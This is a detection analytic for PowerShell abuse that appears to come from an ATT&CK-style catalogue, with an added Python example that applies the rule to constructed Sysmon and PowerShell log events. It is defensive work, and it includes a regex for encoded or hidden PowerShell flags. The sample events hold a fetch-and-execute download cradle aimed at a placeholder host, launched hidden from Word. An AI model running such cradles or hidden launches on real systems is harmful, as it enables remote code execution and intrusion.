DET0455 Abuse of PowerShell for Arbitrary Execution

ID: DET0455
Version: 1.0
Created: 21 October 2025
Last Modified: 21 October 2025

Technique Detected: T1059.001 (PowerShell)

Analytics

Windows

AN1252

Detects behavioral chains in which PowerShell is launched with encoded or obfuscated arguments, from an unusual parent process, or with suspicious modules loaded, optionally followed by outbound network connections or child process creation. Covers both direct invocation (powershell.exe) and indirect invocation, where another process hosts the .NET automation engine (System.Management.Automation.dll) without ever starting powershell.exe; the indirect case is visible only through module loads (Sysmon Event ID 7) and the PowerShell event log, not through process creation. Event IDs 4103 and 4104 are emitted only when Module Logging and Script Block Logging are enabled by policy, so confirm those settings before relying on this analytic.

Log Sources

Data Component | Name | Channel
Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1
Command Execution (DC0064) | WinEventLog:PowerShell | EventCode=4103, 4104, 4105, 4106
Process Metadata (DC0034) | WinEventLog:PowerShell | EventCode=400, 403
Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7

Mutable Elements

Field | Description
CommandLinePattern | Regex pattern for encoded, obfuscated, or hidden PowerShell arguments (e.g., ‘-enc’, ‘-nop’).
ParentProcessName | Filter based on abnormal parents such as Excel, WinWord, or mshta spawning PowerShell.
TimeWindow | Scope detection to off-hours, lateral movement timeframes, or non-maintenance windows.
LoadedModuleList | Tunable to monitor rare or never-before-seen .NET assemblies tied to PowerShell abuse.
ScriptBlockLengthThreshold | Adjustable threshold for the length of script blocks logged by Event ID 4104 (useful for filtering noise).
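The following is an added worked example, not part of this page or of MITRE's ATT&CK content: the AN1252 chain (encoded or hidden arguments, abnormal parent, PowerShell spawning a child) and the ScriptBlockLengthThreshold check, run in Python over a handful of constructed Sysmon EventCode=1 and PowerShell EventCode=4104 records. Field names follow the Sysmon and PowerShell Operational log schemas; the GUIDs, timestamps, paths, the example.invalid URL and the event records themselves are made up. The -EncodedCommand payload is decoded as base64 of a UTF-16LE string, which is what powershell.exe expects, and a malformed payload is tolerated rather than crashing the rule.

```python
"""Worked example for AN1252: the detection chain run over constructed events.

Not part of the MITRE ATT&CK page. Field names follow the Sysmon (EventCode=1)
and PowerShell Operational (EventCode=4104) schemas; every record below is
made up, including the GUIDs, timestamps and the example.invalid URL.
"""
import base64
import re

# --- Mutable elements from the analytic, expressed as tunable constants ------
# CommandLinePattern: encoded, hidden, or policy-bypassing arguments.
COMMANDLINE_PATTERN = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand|nop|noprofile|noni|"
    r"noninteractive|w(?:indowstyle)?\s+hidden|ep\s+bypass|"
    r"executionpolicy\s+bypass)(?=\s|$)"
)
# ParentProcessName: the parents named on the page that should not spawn PowerShell.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "mshta.exe"}
# ScriptBlockLengthThreshold: 4104 script blocks longer than this are flagged.
SCRIPTBLOCK_LENGTH_THRESHOLD = 1000

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def basename(path):
    """Lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE) or return None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # looks encoded but is malformed; the flag match still scores


def analyze(events):
    """Return one alert dict per PowerShell launch or script block that matches."""
    # Map each parent ProcessGuid to the images it spawned, so a PowerShell
    # process can be checked for child process creation from the same channel.
    children = {}
    for ev in events:
        if ev["EventCode"] == 1:
            children.setdefault(ev["ParentProcessGuid"], []).append(basename(ev["Image"]))

    alerts = []
    for ev in events:
        if ev["EventCode"] == 1 and basename(ev["Image"]) in POWERSHELL_IMAGES:
            reasons, cmd = [], ev["CommandLine"]
            if COMMANDLINE_PATTERN.search(cmd):
                reasons.append("suspicious_args")
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                reasons.append("encoded_command")
            parent = basename(ev["ParentImage"])
            if parent in SUSPICIOUS_PARENTS:
                reasons.append("abnormal_parent:" + parent)
            if ev["ProcessGuid"] in children:
                reasons.append("spawned_child:" + ",".join(children[ev["ProcessGuid"]]))
            if reasons:
                alerts.append({"UtcTime": ev["UtcTime"], "ProcessGuid": ev["ProcessGuid"],
                               "reasons": reasons, "decoded": decoded})
        elif ev["EventCode"] == 4104 and len(ev["ScriptBlockText"]) > SCRIPTBLOCK_LENGTH_THRESHOLD:
            alerts.append({"UtcTime": ev["UtcTime"], "ProcessGuid": None,
                           "reasons": ["long_scriptblock"], "decoded": None})
    return alerts


# --- Constructed sample telemetry (not real events) -------------------------
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD_IMAGE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"

SAMPLE_EVENTS = [
    {"EventCode": 1, "UtcTime": "2025-10-21 09:14:02", "ProcessGuid": "{P-1}", "ParentProcessGuid": "{P-0}",
     "Image": WORD_IMAGE, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": '"WINWORD.EXE" /n invoice.docm'},
    {"EventCode": 1, "UtcTime": "2025-10-21 09:14:07", "ProcessGuid": "{P-2}", "ParentProcessGuid": "{P-1}",
     "Image": PS_IMAGE, "ParentImage": WORD_IMAGE, "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"EventCode": 1, "UtcTime": "2025-10-21 09:14:09", "ProcessGuid": "{P-3}", "ParentProcessGuid": "{P-2}",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": PS_IMAGE, "CommandLine": "cmd.exe /c whoami"},
    # Benign administrative use: normal parent, plain arguments; must not alert.
    {"EventCode": 1, "UtcTime": "2025-10-21 10:02:11", "ProcessGuid": "{P-4}", "ParentProcessGuid": "{P-0}",
     "Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"EventCode": 4104, "UtcTime": "2025-10-21 09:14:08", "ScriptBlockText": "$x = '" + "A" * 1500 + "'"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert["UtcTime"], alert["ProcessGuid"], alert["reasons"], alert["decoded"])
```

Running the block prints two alerts: the WINWORD-spawned PowerShell (flagged for its arguments, the decoded download cradle, the abnormal parent and the cmd.exe child) and the oversized 4104 script block; the backup script launched from Explorer is left alone. In production the three constants at the top are the knobs to tune: widen SUSPICIOUS_PARENTS to whatever should never launch PowerShell in your estate, and raise SCRIPTBLOCK_LENGTH_THRESHOLD until legitimate module imports stop tripping it.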